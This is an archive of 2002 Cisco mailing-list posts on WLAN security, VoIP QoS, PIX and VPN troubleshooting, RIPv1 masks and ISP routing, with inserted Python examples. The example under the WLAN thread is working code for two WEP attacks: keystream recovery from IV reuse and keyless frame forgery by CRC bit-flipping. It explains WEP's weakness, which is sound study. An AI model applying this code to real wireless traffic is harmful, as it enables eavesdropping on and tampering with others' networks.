Message ("Your message dated Sun, 10 Nov 2002 07:42:35...") [7:57180]

2002-11-10 Thread
Your message dated Sun, 10 Nov 2002 07:42:35 -0500 (EST) with subject "Of
service"  has been  submitted  to  the moderator  of  the CAREPL-L  list:
[EMAIL PROTECTED]




Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57180&t=57180
--
FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html
Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]



RE: WLAN security matters [7:57160]

2002-11-10 Thread mike greenberg
Most financial corporations that implement a wireless LAN (WLAN) usually do
this:
1) Implement EAP-TLS. This method is "open-standard", as opposed to LEAP,
which is Cisco proprietary. Furthermore, LEAP is vulnerable to a "man in the
middle attack", while EAP-TLS is not. EAP-TLS supports mutual authentication
and, last but not least, EAP-TLS supports a Certificate Authority (CA) in
addition to a password.
FreeRADIUS (which I use) supports EAP-TLS, which works great. EAP-TLS with a CA
solution is not a very scalable one, but that is the tradeoff between
security and convenience.
2) Implement IPSec to run on top of EAP-TLS, which provides another layer of
security. Now, if you are "security" conscious, I would suggest you go with
vendors that support AES instead of 3DES (again, Cisco has no plan of
supporting AES; however, CheckPoint does). This solution doesn't work too
well if you have too many users on the WLAN, because a lot of bandwidth will
be dedicated to EAP-TLS and IPSec traffic. Again, you are trading security
for speed.

I successfully implemented EAP-TLS and IPSec for a WLAN a couple of weeks ago.
It is not that difficult.
Mike
 
"Vicky O. Mair" wrote:

hi there,

ping me offline and i can direct you to folks who have a (hw) solution which
not only secures wlans but also does a good job protecting your overall
backbone security.

/vicky

-Original Message-
From: [EMAIL PROTECTED] [mailto:nobody@;groupstudy.com]On Behalf Of
Carlos Fragoso Mariscal
Sent: Saturday, November 09, 2002 9:19 AM
To: [EMAIL PROTECTED]
Subject: WLAN security matters [7:57160]


Hello,

I'm doing research for the deployment of a secure implementation
of a wireless 802.11a/b environment.

Until WPA (Wi-Fi Protected Access) from the Wi-Fi Alliance comes
to life next year, I realised that WEP is the only air-side Layer 2
(crackable) encryption protocol. This lack of security requires
other upper-layer protocols to do this job, such as IPSec or VPN
implementations. Those solutions seem to be not very scalable indeed.

I would like to know which kind of implementations are the most
preferred and desirable for you. Is anyone managing a similar
secure deployment?
I have heard a little bit about the Cisco vendor implementation (LEAP),
but I suppose it only works with both APs and client cards from Cisco.

Authentication is a first step; 802.1x could help us to authenticate
users and establish secure VLAN-based traffic, but it is not a
solution for air-side sniffing and spoofing. Are IPSec or VPNs the
only solution?

If anyone has any documentation or slides about LEAP, 802.1x or
secure wireless deployments, they will be appreciated.

Thank you,

-- Carlos




Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57182&t=57160
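Added example, not code from either post in this thread: Carlos calls WEP "crackable" and Mike's answer is to carry authentication and confidentiality above it with EAP-TLS and IPSec. The Python below, written for this digest, shows two of the reasons WEP cannot be trusted on its own. First, the IV is only 24 bits and is sent in clear, so it repeats; once two frames share an IV under the same key they share an RC4 keystream, and one known plaintext (every IP frame starts with the same LLC/SNAP header) yields the keystream for the other. Second, the ICV is a plain CRC-32, which is linear, so chosen plaintext bits in a captured frame can be flipped and the ICV patched without knowing the key. The key, IV and payloads are constructed sample values, and the frame layout is simplified to IV || RC4(IV || key, data || ICV).

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP seeds it with IV || shared key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: unkeyed CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Frame body = IV (3 bytes, in clear) || RC4(IV || key, data || ICV)."""
    assert len(iv) == 3, "WEP IVs are 24 bits: only 2**24 distinct keystreams per key"
    return iv + rc4(iv + key, data + icv(data))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    plain = rc4(iv + key, body)
    data, tag = plain[:-4], plain[-4:]
    if icv(data) != tag:
        raise ValueError("ICV mismatch")
    return data


def recover_with_reused_iv(known_frame: bytes, known_data: bytes, target_frame: bytes) -> bytes:
    """Same IV + same key = same keystream. A frame whose plaintext is known
    gives the keystream; XOR it into any other frame carrying that IV."""
    assert known_frame[:3] == target_frame[:3], "needs an IV collision"
    keystream = xor(known_frame[3:], known_data + icv(known_data))
    body = target_frame[3:]
    assert len(keystream) >= len(body), "known frame must be at least as long"
    return xor(body, keystream)[:-4]      # drop the recovered ICV


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Change plaintext bits of an encrypted frame without the key.
    CRC-32 is affine: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(0 * len), so the
    encrypted ICV can be patched in step with the data."""
    iv, body = frame[:3], frame[3:]
    data_len = len(body) - 4
    assert len(delta) == data_len
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(data_len))
    return iv + xor(body, delta + struct.pack("<I", icv_delta & 0xFFFFFFFF))


# Constructed sample values (not captured traffic): a 40-bit key, one IV,
# and two frames that both start with the LLC/SNAP header of an IP packet.
KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("000001")
SNAP_IP = bytes.fromhex("aaaa030000000800")
FRAME_A = wep_encrypt(KEY, IV, SNAP_IP + b"A" * 20)
FRAME_B = wep_encrypt(KEY, IV, SNAP_IP + b"secret payload here.")


def demo():
    """Returns (plaintext of FRAME_B recovered without the key,
                plaintext the AP accepts after a keyless bit-flip of FRAME_B)."""
    stolen = recover_with_reused_iv(FRAME_A, SNAP_IP + b"A" * 20, FRAME_B)
    delta = bytes(len(SNAP_IP)) + xor(b"secret payload here.", b"public payload here.")
    forged = wep_decrypt(KEY, flip_bits(FRAME_B, delta))   # ICV still verifies
    return stolen, forged


if __name__ == "__main__":
    stolen, forged = demo()
    print("recovered from IV reuse:", stolen)
    print("accepted after bit-flip:", forged)
```

Neither attack depends on the key length: a 104-bit key leaves the 24-bit IV space and the linear ICV exactly as they are, and a busy AP cycles through 2^24 IVs in hours. That is why the answers in this thread reach for mutual authentication and an upper-layer cipher rather than a longer WEP key.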



Re: VoIP+QoS+xDSL+H.323Gatekeeper [7:57104]

2002-11-10 Thread Bruce Enders
Mark,
I saw something similar to this on a customer's pilot of AVVID. The 
symptoms were such that if a call between IP phones was established 
prior to the traffic flood, everything worked just fine. If the traffic 
flood came first, the destination IP phone rang, but no voice packets 
were received by either phone, period. And, this was in a pure LAN 
environment! Looking at the display on the 7960s, we discovered that not 
one UDP packet was arriving at either phone! (The fact that the 
destination phone rang would seem to indicate that TCP traffic was 
arriving OK). Unfortunately there was no sniffer available to capture 
the traffic to dissect the problem. The fix was to change the parameters 
on the traffic generator. The customer was using Network Observer. It 
was a new tool for them. The traffic being generated was designated as 
"raw" ethernet frames. As soon as the traffic type was changed to "TCP" 
or any other selection, the problem disappeared.
What are you using to saturate the WAN link?
What I saw might trigger some observation in your network.
Bruce

Mark S wrote:

>Well, this should give you enough to chew on since voice is becoming a hot
>topic.  I am trying to configure VoIP with QoS.  Why over IP and not over
>ATM, you say?  I have to control the call with an H.323 Gatekeeper, and that
>is IP.
>
>My problem appears to be that the call setup (or maybe signalling?) appears
>to be delayed.  The test results are as follows:
>
>If the WAN link is saturated with data packets PRIOR to establishing the
>voice call, the first 10 to 15 (approximately) seconds of the call are
>lost.  After the call is established, voice is rock solid and no voice
>packets are delayed or lost.
>
>If the voice call is established PRIOR to saturating the WAN link with data
>packets, the voice call is rock solid and no voice packets are delayed or
>lost.
>
>Thoughts or configs would be appreciated.
>
>--Mark
>
>
>version 12.2
>service timestamps debug datetime msec
>service timestamps log datetime msec
>no service password-encryption
>!
>hostname Router
>!
>logging buffered 4096 debugging
>!
>memory-size iomem 25
>ip subnet-zero
>!
>no ip domain lookup
>!
>ip cef
>!
>voice call carrier capacity active
>voice rtp send-recv
>!
>no voice hpi capture buffer
>no voice hpi capture destination 
>!
>vc-class atm vip
>  vbr-rt 256 256 10
>  precedence 5 
>  no bump traffic
>  no protect vc
>  no protect group
>!
>vc-class atm normal
>  vbr-nrt 192 192
>  precedence other
>  no protect vc
>  no protect group
>!
>interface ATM0/0
> ip address 1.1.1.254 255.255.255.0
> ip nat outside
> no atm ilmi-keepalive
> bundle-enable
> bundle qosmap
>  protocol ip 1.1.1.1
>  encapsulation aal5snap
>  pvc-bundle data 0/37 
>   class-vc normal
>  pvc-bundle voice 0/36 
>   class-vc vip
> !
> dsl equipment-type CPE
> dsl operating-mode GSHDSL symmetric annex A
> dsl linerate AUTO
> h323-gateway voip interface
> h323-gateway voip id Gatekeeper ipaddr x.x.x.x 1718
> h323-gateway voip h323-id Gateway
> ip rsvp bandwidth 64 64
> ip rsvp resource-provider wfq pvc
>!
>interface FastEthernet0/0
> ip address 10.200.100.1 255.255.255.0
> ip nat inside
> speed auto
>!
>ip nat inside source list 1 interface ATM0/0 overload
>ip classless
>ip route 0.0.0.0 0.0.0.0 1.1.1.1
>no ip http server
>ip pim bidir-enable
>!
>access-list 1 permit 10.200.100.0 0.0.0.255
>!
>call rsvp-sync
>!
>voice-port 2/0
> station-id name StaID
> station-id number 111222
> caller-id enable
>!
>voice-port 2/1
> station-id name StaID
> station-id number 111222
> caller-id enable
>!
>dial-peer cor custom
>!
>dial-peer voice 1 voip
> destination-pattern T
> session target ras
>!
>gateway 
>!
>line con 0
>line aux 0
>line vty 0 4
> login
>!
>no scheduler allocate
>end
-- 


  Bruce Enders                        Email: [EMAIL PROTECTED]
  Chesapeake NetCraftsmen             o: (410)-280-6927, c: (443)-994-0678
  1290 Bay Dale Drive, Suite 312      WWW: http://www.netcraftsmen.net
  Arnold, MD 21012-2325               Cisco CCSI# 96047
                                      Efax 443-331-0651




Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57184&t=57104



RE: Congrats you passed... psyche... you didn't [7:57181]

2002-11-10 Thread Juan Blanco
Michael,

That really hurts. I am sorry; don't give up, you will do fine next time.
Sometimes God tests us in many different ways that we cannot explain; he
works in a very strange way. What bothers me the most is the lack of an
apology from Cisco.

Juan Blanco

-Original Message-
From: [EMAIL PROTECTED] [mailto:nobody@;groupstudy.com]On Behalf Of
Yonkerbonk
Sent: Sunday, November 10, 2002 2:56 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Congrats you passed... psyche... you didn't


Hi all,

I took my Security lab in Brussels on October 17th. I
received an email notification the next day
congratulating me on passing. I flew back to the USA
and told everyone and we celebrated and had a grand
old time. My company made a big deal out of me being
their first double CCIE and all that.
Then a few days later I checked on the website and it
said I failed. So I sent Cisco an email asking WTF?!
Nothing for two days. So I sent them another email.
Finally they wrote back and said, "Oh, it was a bug in
our email system. Sorry for any confusion."
What kind of crap is that? I had to go back and
explain to everyone that I had actually failed. What
if I had received gifts/bonuses/job offers because of
my passing? Plus I think their attitude is totally
unacceptable. No real apology. And how come I had to
find it out? If they knew it was a bug they should
have contacted me.
Anyway, just wanted to let some bitter steam off my
chest. Next time you get an email saying you passed...
better check twice.

Michael Le, CCIE #6811





Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57181&t=57181





VPN Concentrator Issue [7:57185]

2002-11-10 Thread Arni V. Skarphedinsson
I have the following setup:

VPN-Client---VPN-Concentrator---ipsec-tunnel---PIX


Connections from the networks on the inside of the PIX to the concentrator
private network work fine;
connections from the VPN client to the concentrator private network work
fine.

But I can't connect from the inside network of the PIX to the VPN client.

If I use "debug icmp trace" on the PIX I can see the echo requests from the
VPN client when I ping a device on the inside of the PIX, and vice versa
when I ping to the VPN client.

But there are no echo replies getting through...

Any thoughts?



Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57185&t=57185



RE: VTP Concentrator - client to client [7:44276]

2002-11-10 Thread Arni V. Skarphedinsson
Yes, you can do this with Reverse Route Injection. I have used it; it's
easy to set up.




Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57186&t=44276



RE: VPN Concentrator Issue [7:57185]

2002-11-10 Thread Elijah Savage III
From my little knowledge, the PIX supports IPsec passthrough, meaning there
should be nothing special you have to do to the PIX to get it to work
with this setup. But are you using NAT? Because if so, there may be a
setting on the VPN client that needs to be adjusted, like enabling
transparent tunneling on the client.

-Original Message-
From: Arni V. Skarphedinsson [mailto:nobody@;groupstudy.com] 
Sent: Sunday, November 10, 2002 9:04 AM
To: [EMAIL PROTECTED]
Subject: VPN Concentrator Issue [7:57185]


I have the following setup:

VPN-Client---VPN-Concentrator---ipsec-tunnel---PIX


Connections from the networks on the inside of the PIX to the
concentrator private network work fine; connections from the VPN client
to the concentrator private network work fine.

But I can't connect from the inside network of the PIX to the VPN client.

If I use "debug icmp trace" on the PIX I can see the echo requests from
the VPN client when I ping a device on the inside of the PIX, and vice
versa when I ping to the VPN client.

But there are no echo replies getting through...

Any thoughts?




Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57187&t=57185



Problem pinging from inside thru PIX to outside [7:57188]

2002-11-10 Thread Tunji Suleiman
Hi Group,

I am trying to deploy a VPN solution and ran into a seemingly simple problem
which I can't seem to be able to resolve. I terminated the radio link from the ISP
on fa0/0 of my Cisco 2621 router. I connected fa0/1 of the 2621 to e0/0, the
outside of my PIX 506, by cross cable and connected e0/1, the inside of the PIX,
to the LAN switch. The inside network has address 10.240.77.0/24 and the VPN is
between the Exchange server at 10.240.77.3 and the larger 10.240.0.0 network.
The ISP has assigned me the following IP addresses: 66.135.55.171, .172, .173
and .174 from a subnet with mask 255.255.255.192. So I assigned .171 to
fa0/1 - inside of the 2621, .172 to e0/0 - outside of the PIX, .173 as global on
the PIX for PAT, and reserved .174 for a future VG.

I wanted to put the config through its paces by pinging around the PIX. For
testing, I had entered on the PIX:

conduit permit ICMP any any
access-list aclout permit icmp any any
access-list aclin permit icmp any any
access-group aclout in interface outside

When I tried to apply aclin for outbound icmp, with the command:

access-group aclin out interface inside

the PIX responded with:

Type help or '?' for list of available commands.

When I repeated the command with ? at the end, the PIX responded with:

usage: [no] access-group  in interface  inside

It seemed the PIX only requires permitting inbound ICMP from the outside. So
I proceeded with the pings. My output is below:

From Router:

NB: pixout, pixin and exchange are host entries on the router for the PIX
outside interface, the PIX inside interface and the Exchange server, with IP
addresses 66.135.55.172, 10.240.77.1 and 10.240.77.3 respectively.

MyRouter#ping pixout

Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 66.135.55.172, timeout is 2 seconds:
!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/4 ms

MyRouter#ping pixin

Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 10.240.77.1, timeout is 2 seconds:
!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/4 ms

MyRouter#ping exchange

Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 10.250.77.3, timeout is 2 seconds:
!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/4 ms

From PIX:

NB: I used the following on the PIX for name-to-IP address mapping:
names
name 66.135.55.171 gateway
name 10.240.77.3 exchange

PIX# ping gateway
gateway response received -- 0ms
gateway response received -- 0ms
gateway response received -- 0ms
PIX# ping exchange
exchange response received -- 0ms
exchange response received -- 0ms
exchange response received -- 0ms
PIX#

From Exchange:
C:\>ping 10.240.77.1

Pinging 10.240.77.1 with 32 bytes of data:

Reply from 10.240.77.1: bytes=32 time<...

C:\>ping 66.135.55.171

Pinging 66.135.55.171 with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 66.135.55.171:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum =  0ms, Average =  0ms

C:\>ping 66.135.55.172

Pinging 66.135.55.172 with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 66.135.55.172:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum =  0ms, Average =  0ms

C:\>

I can ping from the router through the PIX to the Exchange server in the inside
network, from the PIX all around, and from the Exchange to the PIX inside
interface, but not from the Exchange to the PIX outside interface or to the
router. I know it's gotta be something simple, but I can't seem to figure it
out.

The PIX is a 506E, version 6.1(2). I will appreciate it greatly if somebody will
just point out to me what I'm missing.

TIA.







Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57188&t=57188



RE: Problem pinging from inside thru PIX to outside [7:57188]

2002-11-10 Thread Elijah Savage III
09186a0080094e8a.shtml#pingown

Look at that link; watch out for word wrap. Hope it helps. You have to
enable ping terminating on a PIX interface.

-Original Message-
From: Tunji Suleiman [mailto:tunjisule@;hotmail.com] 
Sent: Sunday, November 10, 2002 9:39 AM
To: [EMAIL PROTECTED]
Subject: Problem pinging from inside thru PIX to outside [7:57188]






Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57189&t=57188



RE: Congrats you passed... psyche... you didn't [7:57183]

2002-11-10 Thread Cisco Nuts
Sue the damn *#@!!!

:-)

That's really messed up, man. How could they mess up something like
this? Here is what I would "fight" for: at least a free lab for the 2nd
try and some goodies!

Good Luck!!

 








Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57190&t=57183



Re: How RIPv1 masks are determined - confused [7:57049]

2002-11-10 Thread Robert Slaski
Tom Martin wrote:

> Robert,
>
> I believe that your diagram should reflect R1's serial interface to R2
> as s0/1 instead of s0/0.  This caused me some confusion in trying to
> figure out the configs.  Actually, there is still some confusion given

Sorry for that - this was a copy-pasting error (there's a whole bunch of 
other stuff running on the routers, I had to filter it out). The 
addresses are unique, obviously - if they weren't then the router would 
drop (as unroutable) the packet with src_IP equal to the IP of one of its 
interfaces - so the RIP update would have had no chance to enter the RIP 
process.

> You make a strong argument that a more logical interpretation would be
> to use the local IP address 172.16.66.1/25 to interpret the route since
> it is the only IP address that is on the same subnet as the sending
> router (since the other IPs configured on the link should, based on
> normal IP rules, require another router to communicate with the sender).
>   All documentation I've come across and configuration I have done
> indicates that the receiving router validates the update based on major
> network only, and then uses the mask of the locally configured address
> of that network to interpret the incoming networks.  So, technically,
> interpreting the route as 172.16.77.0/29 isn't "wrong" -- it's just one
> of 3 possible ways of interpreting the advertised network.

That's correct - all choices, according to many written sources, are 
perfectly correct. But the router has to break a tie - in this case the 
longest subnet mask was chosen. I'm still curious whether this behaviour is 
defined somewhere or is an IOS-dependent Cisco feature.

For reference: below is an algorithm, hopefully complete, for classful 
processing of RIP updates, compiled by me from various sources and 
documents including Doyle and Zinin. I had to add 'longest' to 
'apply_mask_of_incoming_interface' based on the results of testing this issue.


  Receiving (update):
    if (major net of update the same as of incoming interface ?)
    {
      NO:
        if (any subnets of major net of update already exist in route
            table known from other interfaces ?)
        {
          YES: discard( update );
               exit();
          NO:  apply_classfull_mask( update );
               populate_rt( update );
               exit();
        }
      YES:
        if (there are any bits in host portion ?)
        {
          NO:  apply_longest_mask_of_incoming_interface( update );
               populate_rt( update );
               exit();
          YES: apply_32_mask( update );
               populate_rt( update );
               exit();
        }
    }

  Sending (update):
    if (subnet of update in the same major net as outgoing interface ?)
    {
      YES: if (subnet mask is the same as subnet mask of sending
               interface ?)
           {
             NO:  if (the update is a host route ?)
                  {
                    YES: send( update );
                         exit();
                    NO:  discard( update );
                         exit();
                  }
             YES: send( update );
                  exit();
           }
      NO:  summarize_classfull( update );
           send( update );
           exit();
    }

>
> I'm curious as to whether your configuration works at all given the
> next-hop address (172.16.66.1) is also a valid IP address on R2.  Are
> you able to ping 172.16.200.1 from R2?  It seems to me that R2 should be 

It will drop packet as unroutable.

robert,
--




Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57192&t=57049
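An added example, not Robert's code: a Python transcription of the two decision trees in his post, using the standard ipaddress module, so the classful mask inference can be exercised on concrete addresses. Addresses go in and come out as strings. The interface addresses used as sample input (172.16.66.1/25, 172.16.10.1/24 and 172.16.90.1/29 on one interface, i.e. a primary plus secondaries with different masks, the situation the thread is about) are made up here; only the 172.16.66.1/25 and 172.16.77.0/29 values come from the thread. The receive side implements the "longest mask of the incoming interface" tie-break Robert observed in his lab; whether that is defined anywhere or is IOS-specific is exactly his open question, so that branch models observed behaviour, not a standard.

```python
from ipaddress import IPv4Address, IPv4Interface, IPv4Network
from typing import Optional


def classful_network(addr: IPv4Address) -> IPv4Network:
    """Class A /8, class B /16, class C /24, decided by the first octet."""
    first_octet = int(addr) >> 24
    plen = 8 if first_octet < 128 else 16 if first_octet < 192 else 24
    return IPv4Network((addr, plen), strict=False)


def receive_update(advertised: str, interface_addrs: list, other_routes: list) -> Optional[str]:
    """Mask a RIPv1 receiver assigns to `advertised` (RIPv1 carries no mask).

    interface_addrs: every address configured on the receiving interface
                     (primary and secondaries), as 'a.b.c.d/len'.
    other_routes:    routes already in the table that were learned through
                     other interfaces, as 'a.b.c.d/len'.
    Returns the route to install as 'a.b.c.d/len', or None to discard it.
    """
    addr = IPv4Address(advertised)
    major = classful_network(addr)
    same_major = [IPv4Interface(a) for a in interface_addrs
                  if classful_network(IPv4Interface(a).ip) == major]
    if not same_major:
        # Foreign major net: accept it as the classful summary, unless
        # subnets of that major net are already known via other interfaces,
        # in which case the summary is ambiguous and is discarded.
        for r in other_routes:
            net = IPv4Network(r)
            if net.prefixlen > major.prefixlen and classful_network(net.network_address) == major:
                return None
        return str(major)
    # Same major net as the incoming interface: borrow one of its masks.
    # With secondaries there may be several; the lab result in this thread
    # is that the longest one wins (assumption modelled from that result).
    plen = max(i.network.prefixlen for i in same_major)
    candidate = IPv4Network((addr, plen), strict=False)
    if candidate.network_address == addr:      # no bits set in the host part
        return str(candidate)
    return str(IPv4Network((addr, 32)))        # host bits set: host route


def send_update(route: str, out_interface: str) -> Optional[str]:
    """Address a RIPv1 sender puts on the wire for `route`, or None if suppressed."""
    net = IPv4Network(route)
    out = IPv4Interface(out_interface)
    route_major = classful_network(net.network_address)
    if route_major != classful_network(out.ip):
        return str(route_major.network_address)  # summarize at the classful boundary
    if net.prefixlen == out.network.prefixlen or net.prefixlen == 32:
        return str(net.network_address)          # same mask as the link, or a host route
    return None                                  # mask differs and not a host route


if __name__ == "__main__":
    link = ["172.16.66.1/25", "172.16.10.1/24", "172.16.90.1/29"]
    print(receive_update("172.16.77.0", link, []))   # 172.16.77.0/29 (longest mask)
    print(receive_update("172.16.77.3", link, []))   # 172.16.77.3/32 (host bits set)
    print(send_update("172.16.77.0/29", "172.16.66.1/25"))   # None: mask mismatch
```

The ambiguity Tom raised is visible directly: the same advertised address 172.16.77.0 would come out as /24, /25 or /29 depending on which of the interface's masks is picked, and nothing on the wire says which is meant. That is the case for RIPv2 (or simply not mixing masks on one interface), not for a cleverer tie-break.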



Routing and Design Problem [7:57193]

2002-11-10 Thread Tunji Suleiman
Hi Group,

I have a routing problem. I am certain my present config is alright and I just 
need a routing entry from the ISP for things to work. But the ISP is not 
cooperating, insisting the problem is with my config. So I want to make sure 
I've explored all options before going back to them.

Here's the scenario:

The ISP created a global /26 subnet, say 80.80.80.128 255.255.255.192, and 
assigns addresses from it to all their wireless clients through a multipoint 
radio base station. They assigned 80.80.80.171, .172, .173 and .174 to my 
client. My target is a VPN solution between an Exchange server behind the 
PIX and a larger network on the Internet with RFC 1918 address 10.240.0.0. 
Presently all ISP clients use the ISP's Internet uplink with address 
80.80.80.129 as default gateway. This works for any client with a dual-homed 
proxy with a global address on the external link to the ISP and an internal 
interface to a LAN with RFC 1918 addresses.

My situation, however, has a 2611 router with 2 Ethernet interfaces, one to 
the ISP radio and the other to the PIX firewall. So I thought up a few options.

Option A: My preferred option and present config

Use ISP-assigned global addresses on the router's internal link to the PIX, 
the PIX outside link to the router and the PAT address on the PIX; reserve a 
global address for future use; and use RFC 1918 addresses on the inside of 
the PIX for translation by PAT.

For the external radio link between router & ISP, do one of:
1. use ip unnumbered on the link to the ISP, with a config similar to:

int e0/0
description link-2-isp
ip unnumbered e0/1
!
int e0/1
description link-2-pix
ip address 80.80.80.171 255.255.255.192
!
ip default-gateway 80.80.80.129

2. get the ISP to create and assign a global or RFC 1918 /30 subnet for the 
wireless link to my client, so I have a config similar to:

int e0/0
description link-2-isp
ip address 192.168.0.2 255.255.255.252
!
int e0/1
description link-2-pix
ip address 80.80.80.171 255.255.255.192
!
ip route 0.0.0.0 0.0.0.0 e0/0 or 192.168.0.1

3. get the ISP to create a /29 subnet, e.g. 80.80.80.182 255.255.255.248, and 
route it to my client with a route entry like:

4. get the ISP to create VLANs and corresponding routing entries to my client 
or other similar clients.

It seemed to me that either way, for packets to find their way back to me from 
the ISP and the Internet, the ISP has to create routing entries similar to:

ip route 80.80.80.171 255.255.255.192 isp's-connected-interface
ip route 80.80.80.172 255.255.255.192 80.80.80.171
ip route 80.80.80.173 255.255.255.192 80.80.80.171
ip route 80.80.80.174 255.255.255.192 80.80.80.171 for 1 & 2 above

ip route 80.80.80.184 255.255.255.248 isp's-connected-interface for 3 & 4 
above.

Option B:

1. Assign 1 address from ISP-assigned global addresses, say 80.80.80.171 to 
router ext link to ISP, reserve for future use or waste remaining 3 since I 
can't reassign the addresses behind the router. Then maybe:

a. Assign a private say 192.168.x.0/24 to PIX inside interface and all 
inside hosts including Exchange server. Assign 10.240.77.0/24 between PIX 
outside interface and router inside interface.

b. use a combination of static and dynamic NAT on PIX for exchange and 
internal hosts, specifically statically translating for Exchange and 
dynamically for other hosts.

c. use PAT on router to translate for everything originating from PIX.

I have tried the IP unnumbered option on my router e0/0, but the router won't 
accept it, with error: point-to-point (non-multi-access) interfaces only.

Now, my questions are:

1. If the ISP refuses to cooperate completely, what are the implications of 
Option B with the double translation on PIX and router?
2. If the ISP agrees to cooperate, which of the options in A above is the 
best solution?
3. Related to 2 above, if ISP agrees to cooperate with the simplest 
solution, which seem to me to be, just a routing entry, is it possible, and 
if so, how do I get to use IP unnumbered on an ethernet interface?
4. Is there any better option/solution which I have not envisaged?

I should be most grateful to anybody able to assist me on this problem. 
Priscilla, Howard, Larry Letterman, Steve Rider ... etc etc. I will send my 
present configs on request.

TIA.

Tunji
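Added example, not Tunji's config and not something anyone on the list posted: a short Python model of the address plan in option A, built from the figures in the post, to see how each side's longest-prefix match resolves the addresses. It assumes the ISP router has nothing but its connected /26 on the radio segment, and that 80.80.80.171 is the address the 2611 presents on the radio side (the post's option A.1); the next-hop labels are illustrative.

```python
import ipaddress

# Figures from the post: the ISP's radio segment, the ISP gateway and the four
# addresses handed to the client. ROUTER_UPLINK is an assumption for this
# example: the one address the 2611 answers for on the radio side.
ISP_SEGMENT = ipaddress.ip_network("80.80.80.128/26")
ISP_GATEWAY = ipaddress.ip_address("80.80.80.129")
CLIENT_ADDRS = [ipaddress.ip_address("80.80.80.%d" % h) for h in (171, 172, 173, 174)]
ROUTER_UPLINK = ipaddress.ip_address("80.80.80.171")


def lookup(table, dst):
    """Longest-prefix match over [(network, next_hop), ...]; returns the
    next_hop of the most specific matching entry, or None."""
    dst = ipaddress.ip_address(dst)
    hits = [(net, nh) for net, nh in table if dst in net]
    return max(hits, key=lambda e: e[0].prefixlen)[1] if hits else None


def isp_table(with_host_routes):
    """The ISP router's view: its connected /26 on the radio interface, plus,
    optionally, /32 statics for the client addresses that live behind the
    2611. Without them the ISP router treats .172-.174 as directly connected
    and ARPs for them on the radio segment, where nobody answers."""
    table = [(ISP_SEGMENT, "connected")]
    if with_host_routes:
        table += [(ipaddress.ip_network("%s/32" % a), str(ROUTER_UPLINK))
                  for a in CLIENT_ADDRS if a != ROUTER_UPLINK]
    return table


def host_routes(addrs=CLIENT_ADDRS, uplink=ROUTER_UPLINK):
    """IOS-style statics the ISP needs for options A.1/A.2. The mask has to be
    /32: a /26 mask on these routes, as written in the post, is no more
    specific than the ISP's connected /26 and does not change forwarding."""
    return ["ip route %s 255.255.255.255 %s" % (a, uplink)
            for a in addrs if a != uplink]


def covering_block(addrs=CLIENT_ADDRS):
    """Smallest aligned prefix holding every client address: the block the ISP
    would have to route if it carved the client out of the /26 (option A.3)."""
    lo, hi = min(addrs), max(addrs)
    for plen in range(32, -1, -1):
        net = ipaddress.ip_network("%s/%d" % (lo, plen), strict=False)
        if hi in net:
            return net


def is_aligned(cidr):
    """True when the address is the network address of its prefix; a route or
    subnet written with host bits set (80.80.80.182/29 in the post) is not a
    valid network."""
    try:
        ipaddress.ip_network(cidr, strict=True)
        return True
    except ValueError:
        return False


def client_table():
    """The 2611's own view under option A.1: the /26 is connected on the
    PIX-facing e0/1, e0/0 borrows that address (ip unnumbered), and the default
    points at the ISP gateway. The gateway falls inside the connected /26, so
    the router resolves it on e0/1, the PIX side, not out the radio link."""
    return [(ISP_SEGMENT, "e0/1 connected"),
            (ipaddress.ip_network("0.0.0.0/0"), str(ISP_GATEWAY))]


if __name__ == "__main__":
    for dst in ("80.80.80.172", "80.80.80.171"):
        print(dst, "ISP without statics ->", lookup(isp_table(False), dst),
              "| with statics ->", lookup(isp_table(True), dst))
    print("\n".join(host_routes()))
    print("covering block:", covering_block(),
          "| 80.80.80.182/29 aligned:", is_aligned("80.80.80.182/29"))
    print("2611 resolves gateway via:", lookup(client_table(), str(ISP_GATEWAY)))
```

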